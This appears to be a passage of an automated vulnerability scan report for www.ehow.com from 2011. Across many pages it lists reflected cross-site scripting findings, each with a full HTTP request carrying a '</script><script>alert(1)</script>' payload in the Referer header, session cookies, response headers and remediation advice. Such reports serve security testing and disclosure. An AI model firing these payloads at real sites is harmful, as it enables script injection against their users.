<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plant Care - How To Information | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5840</script><script>alert(1)</script>c6c90bc3237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /plants/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a5840</script><script>alert(1)</script>c6c90bc3237
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70812
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plants - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0263</script><script>alert(1)</script>c17e4ec4831 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c0263</script><script>alert(1)</script>c17e4ec4831
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49157
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8838a</script><script>alert(1)</script>04cbc86da1d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /real-estate-and-investment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8838a</script><script>alert(1)</script>04cbc86da1d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71175
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Real Estate & Investment - How To Information | e ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75b27</script><script>alert(1)</script>c1855e6bba5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /recipes/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=75b27</script><script>alert(1)</script>c1855e6bba5
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72811
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recipes - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88cc7</script><script>alert(1)</script>f36c82459a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /recreational-activities/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=88cc7</script><script>alert(1)</script>f36c82459a4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70635
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recreational Activities - How To Information | eH ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c8f9</script><script>alert(1)</script>5616881ca9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /relationships-and-family/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=6c8f9</script><script>alert(1)</script>5616881ca9
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70783
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Relationships & Family - How To Information | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da53</script><script>alert(1)</script>03f82fa2ae7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /search.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4da53</script><script>alert(1)</script>03f82fa2ae7
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: UserView=List; expires=Thu, 02-Feb-2012 15:15:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30878
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e62b1</script><script>alert(1)</script>18a9920f7ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /share.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e62b1</script><script>alert(1)</script>18a9920f7ad
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25999
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Share, Comment, Show & Tell, Write | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420a6</script><script>alert(1)</script>dd06843fc54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /site-map.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=420a6</script><script>alert(1)</script>dd06843fc54
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25596
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d64e</script><script>alert(1)</script>164ea1f1fab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /sitemap.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3d64e</script><script>alert(1)</script>164ea1f1fab
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22043
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70301</script><script>alert(1)</script>68b2a8e4972 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /sports/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=70301</script><script>alert(1)</script>68b2a8e4972
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:27 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71331
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Sports - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb02e</script><script>alert(1)</script>83c4d78cc01 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /terms_use.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=bb02e</script><script>alert(1)</script>83c4d78cc01
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73171
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Terms of Use | eHow.com</title> <meta charset= ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9ff</script><script>alert(1)</script>5579f6c3bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_227_take-pictures.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=db9ff</script><script>alert(1)</script>5579f6c3bbf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d67b</script><script>alert(1)</script>a7c5286818 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_2488_lose-weight.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7d67b</script><script>alert(1)</script>a7c5286818
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=2488; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43110
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b85</script><script>alert(1)</script>997e8d8e83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_253_lose-weight-now.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=39b85</script><script>alert(1)</script>997e8d8e83
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5651</script><script>alert(1)</script>f5e0a2d1715 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3493_lose-weight-dieting.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d5651</script><script>alert(1)</script>f5e0a2d1715
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3493; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45321
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4311c</script><script>alert(1)</script>71d0e12f2ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_363_winter-sports.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4311c</script><script>alert(1)</script>71d0e12f2ce
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:47 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49491
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Hit the Slopes for Winter Fitness - Downhill sk ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90e55</script><script>alert(1)</script>2feace9df29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3818_flu-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=90e55</script><script>alert(1)</script>2feace9df29
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fca</script><script>alert(1)</script>fc7810aa163 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3990_home-security-systems-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=55fca</script><script>alert(1)</script>fc7810aa163
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3990; expires=Thu, 02-Feb-2012 15:16:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44535
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Security Systems Guide | eHow.com </title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a5c9</script><script>alert(1)</script>35bc6437695 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_401_home-alarms.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7a5c9</script><script>alert(1)</script>35bc6437695
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=401; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51358
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarms - Home Alarm Systems | eHow.com </ ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b94</script><script>alert(1)</script>5e5d8da7a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
